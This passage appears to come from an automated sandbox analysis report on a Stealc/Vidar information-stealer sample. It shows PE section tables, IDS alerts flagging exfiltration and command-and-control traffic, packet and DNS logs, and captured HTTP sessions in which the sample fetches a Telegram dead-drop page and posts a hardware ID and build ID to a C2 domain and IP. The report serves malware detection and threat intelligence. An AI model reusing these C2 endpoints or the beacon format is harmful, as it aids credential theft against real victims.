| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x26000 | 0xec00 | 7f989802d7e7d6b457ced4c3233180fd | False | 0.9982289459745762 | data | 7.97802160630939 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x27000 | 0x40c | 0x400 | f9f43cdd41618b54301677af7d36dbcf | False | 0.4853515625 | data | 4.186032850312854 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x28000 | 0x1000 | 0x200 | 299e32f9c8f003ccfc3eeaceaa2dbd9b | False | 0.150390625 | data | 1.0253754142196863 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x29000 | 0x2ad000 | 0x200 | fae5c1c480b358846f8f1ff0c3e6c9e0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| xyhrtgkn | 0x2d6000 | 0x1ab000 | 0x1aa400 | f473938a3584b8522505cb31225eb071 | False | 0.9948176319648094 | data | 7.955289387133198 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| atwyfmcm | 0x481000 | 0x1000 | 0x600 | 1256cb851b004524a5e2185195d72a00 | False | 0.5384114583333334 | data | 4.855743039337339 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x482000 | 0x3000 | 0x2200 | 2a9a8e0f340a1b86b6baafb395eadb7a | False | 0.06020220588235294 | DOS executable (COM) | 0.782857907341733 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_MANIFEST | 0x47fe84 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535 |
                                                                                                                                          RT_MANIFEST0x4800da0x143XML 1.0 document, ASCII textEnglishUnited States0.628482972136223
                                                                                                                                          DLLImport
                                                                                                                                          kernel32.dlllstrcpy
                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                          EnglishUnited States


| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| 2025-03-19T14:00:14.506040+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.10 | 49683 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:00:17.957230+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 78.47.63.132 | 443 | 192.168.2.10 | 49685 | TCP |
| 2025-03-19T14:00:20.590290+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.10 | 49686 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:00:20.590469+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 78.47.63.132 | 443 | 192.168.2.10 | 49686 | TCP |
| 2025-03-19T14:00:28.067428+0100 | 2059331 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 | 1 | 192.168.2.10 | 49694 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:02:16.338105+0100 | 2059331 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 | 1 | 192.168.2.10 | 49699 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:02:16.739083+0100 | 2059331 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 | 1 | 192.168.2.10 | 49700 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:02:16.739083+0100 | 2859636 | ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) | 1 | 192.168.2.10 | 49700 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:02:17.804395+0100 | 2059331 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 | 1 | 192.168.2.10 | 49701 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:02:17.804395+0100 | 2859636 | ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) | 1 | 192.168.2.10 | 49701 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:02:19.840485+0100 | 2059331 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 | 1 | 192.168.2.10 | 49702 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:02:19.840485+0100 | 2859636 | ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) | 1 | 192.168.2.10 | 49702 | 78.47.63.132 | 443 | TCP |
                                                                                                                                          • Total Packets: 231
                                                                                                                                          • 443 (HTTPS)
                                                                                                                                          • 53 (DNS)
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                                                                          Mar 19, 2025 14:00:28.068728924 CET49694443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:00:28.068758965 CET4434969478.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:14.846384048 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:14.846441031 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:14.847249031 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:14.847249031 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:14.847284079 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:15.584636927 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:15.586486101 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:15.621989965 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:15.622014046 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:15.639235973 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:15.639260054 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.031196117 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.031250000 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.031323910 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.031881094 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.031893015 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.338114977 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.338272095 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.338288069 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.338345051 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.338500977 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.338566065 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.342381001 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.342381001 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.342381001 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.735090971 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.735236883 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.736174107 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.736181974 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738305092 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738325119 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738393068 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738404036 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738416910 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738430977 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738490105 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738504887 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738513947 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738528013 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738559961 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738578081 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738615990 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738631010 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738658905 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738672972 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738729954 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738750935 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738761902 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738775015 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738802910 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738815069 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738858938 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738873959 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.738941908 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.738956928 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.739028931 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.739046097 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.739069939 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.739082098 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.739090919 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.739104986 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.739124060 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.739131927 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.739214897 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.739224911 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.739247084 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.739265919 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.739280939 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.739284992 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:16.780392885 CET49699443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:16.780426979 CET4434969978.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.023544073 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.023598909 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.023744106 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.024385929 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.024405003 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.799406052 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.801486969 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.802061081 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.802071095 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.803971052 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.803980112 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.804115057 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.804132938 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.804138899 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.804152966 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.804177046 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.804182053 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.804245949 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.804264069 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.804323912 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.804332972 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:17.804354906 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:17.804368973 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:18.183022022 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:18.183073044 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:18.183083057 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:18.183101892 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:18.183144093 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:18.183144093 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:18.184343100 CET49700443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:18.184359074 CET4434970078.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:18.796875000 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:18.796950102 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:18.797044992 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:18.797044992 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:18.807503939 CET49701443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:18.807528019 CET4434970178.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.118402958 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.118470907 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.122572899 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.126403093 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.126435041 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.837347031 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.837749958 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.838099003 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.838112116 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.839989901 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840006113 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840065956 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840080023 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840086937 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840092897 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840225935 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840255976 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840418100 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840449095 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840678930 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840696096 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840712070 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840718985 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840907097 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:19.840941906 CET4434970278.47.63.132192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:19.840956926 CET49702443192.168.2.1078.47.63.132
                                                                                                                                          Mar 19, 2025 14:02:26.655477047 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.655495882 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.655500889 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.655529022 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.655544043 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.655549049 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.655695915 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.658976078 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.659579992 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.659612894 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.659638882 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.659662962 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.659668922 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.659692049 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.663096905 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.663199902 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.663204908 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.665323019 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.665390015 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.665395021 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.667874098 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.667958021 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.667963028 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.670696020 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.670845985 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.670850039 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.673232079 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.673377037 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.673381090 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.676122904 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.676213026 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.676218033 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.679023027 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.679131031 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.679136038 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.682670116 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.683527946 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.683532000 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.684568882 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.685791969 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.685796022 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.690977097 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.693201065 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.693205118 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.697288990 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.697382927 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.697387934 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.697412014 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.697511911 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.697837114 CET49711443192.168.2.10142.250.186.164
                                                                                                                                          Mar 19, 2025 14:02:26.697849035 CET44349711142.250.186.164192.168.2.10
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Mar 19, 2025 14:00:10.086121082 CET6349553192.168.2.101.1.1.1
                                                                                                                                          Mar 19, 2025 14:00:10.093422890 CET53634951.1.1.1192.168.2.10
                                                                                                                                          Mar 19, 2025 14:00:11.666421890 CET5582853192.168.2.101.1.1.1
                                                                                                                                          Mar 19, 2025 14:00:11.682214975 CET53558281.1.1.1192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:23.813159943 CET53499761.1.1.1192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:23.926227093 CET53589551.1.1.1192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:24.908086061 CET5796353192.168.2.101.1.1.1
                                                                                                                                          Mar 19, 2025 14:02:24.908375978 CET5349353192.168.2.101.1.1.1
                                                                                                                                          Mar 19, 2025 14:02:24.914949894 CET53579631.1.1.1192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:24.915292978 CET53534931.1.1.1192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.062863111 CET53574281.1.1.1192.168.2.10
                                                                                                                                          Mar 19, 2025 14:02:26.193135023 CET53507641.1.1.1192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 19, 2025 14:00:10.086121082 CET | 192.168.2.10 | 1.1.1.1 | 0xba31 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Mar 19, 2025 14:00:11.666421890 CET | 192.168.2.10 | 1.1.1.1 | 0xa76 | Standard query (0) | y.p.formaxprime.co.uk | A (IP address) | IN (0x0001) | false
Mar 19, 2025 14:02:24.908086061 CET | 192.168.2.10 | 1.1.1.1 | 0x649e | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Mar 19, 2025 14:02:24.908375978 CET | 192.168.2.10 | 1.1.1.1 | 0x882d | Standard query (0) | www.google.com | 65 | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 19, 2025 14:00:10.093422890 CET | 1.1.1.1 | 192.168.2.10 | 0xba31 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Mar 19, 2025 14:00:11.682214975 CET | 1.1.1.1 | 192.168.2.10 | 0xa76 | No error (0) | y.p.formaxprime.co.uk | | 78.47.63.132 | A (IP address) | IN (0x0001) | false
Mar 19, 2025 14:02:24.914949894 CET | 1.1.1.1 | 192.168.2.10 | 0x649e | No error (0) | www.google.com | | 142.250.186.164 | A (IP address) | IN (0x0001) | false
Mar 19, 2025 14:02:24.915292978 CET | 1.1.1.1 | 192.168.2.10 | 0x882d | No error (0) | www.google.com | | | 65 | IN (0x0001) | false

                                                                                                                                          • t.me
                                                                                                                                          • y.p.formaxprime.co.uk
                                                                                                                                          • www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49681 | 149.154.167.99 | 443 | 6980 | C:\Users\user\Desktop\random(2).exe

Timestamp | Bytes transferred | Direction | Data
2025-03-19 13:00:10 UTC | 90 | OUT | GET /g_etcontent HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
2025-03-19 13:00:11 UTC | 511 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 19 Mar 2025 13:00:10 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12411
Connection: close
Set-Cookie: stel_ssid=a95a95c28573b44b36_4621748884215959652; expires=Thu, 20 Mar 2025 13:00:10 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2025-03-19 13:00:11 UTC | 12411 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @g_etcontent</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.p


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49682 | 78.47.63.132 | 443 | 6980 | C:\Users\user\Desktop\random(2).exe

Timestamp | Bytes transferred | Direction | Data
2025-03-19 13:00:12 UTC | 179 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
Host: y.p.formaxprime.co.uk
Connection: Keep-Alive
Cache-Control: no-cache
2025-03-19 13:00:13 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Mar 2025 13:00:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-03-19 13:00:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49683 | 78.47.63.132 | 443 | 6980 | C:\Users\user\Desktop\random(2).exe

Timestamp | Bytes transferred | Direction | Data
2025-03-19 13:00:13 UTC | 271 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----90r90zuknop8ym7qiwbs
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
Host: y.p.formaxprime.co.uk
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
2025-03-19 13:00:13 UTC | 256 | OUT | Data Ascii:
  ------90r90zuknop8ym7qiwbs
  Content-Disposition: form-data; name="hwid"

  F3A55A0C0D332632427659-a33c7340-61ca
  ------90r90zuknop8ym7qiwbs
  Content-Disposition: form-data; name="build_id"

  80621af4947f6f7800865a5c80d8f329
  ------90r90zuknop8ym7qiwbs--
